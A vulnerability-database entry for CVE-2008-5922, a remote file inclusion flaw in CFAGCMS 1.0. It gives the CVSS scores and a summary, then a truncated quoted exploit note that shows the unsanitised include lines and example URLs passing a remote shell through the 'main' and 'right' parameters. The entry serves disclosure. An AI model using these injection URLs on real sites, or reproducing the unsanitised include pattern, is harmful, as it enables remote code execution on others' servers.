7.5
CVSSv2

CVE-2008-5922

Published: 21/01/2009 Updated: 11/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple PHP remote file inclusion vulnerabilities in themes/default/index.php in Cant Find A Gaming CMS (CFAGCMS) 1 allow remote malicious users to execute arbitrary PHP code via a URL in the (1) main and (2) right parameters.

Vulnerable Product Search on Vulmon Subscribe to Product

cfagcms cfagcms 1.0

Exploits

Author : BeyazKurt - Bey4zKurt@GmailCom Script : CFAGCMS Download : sourceforgenet/project/showfilesphp?group_id=197936 Vuln : Page themes/default/indexphp, Line 15-16 : <?php include($main);?> <?php include($right);?> SiteCom/cfagcms/themes/default/indexphp?main=SHELL SiteCom/cfagcms/themes/default/indexphp?right=SH ...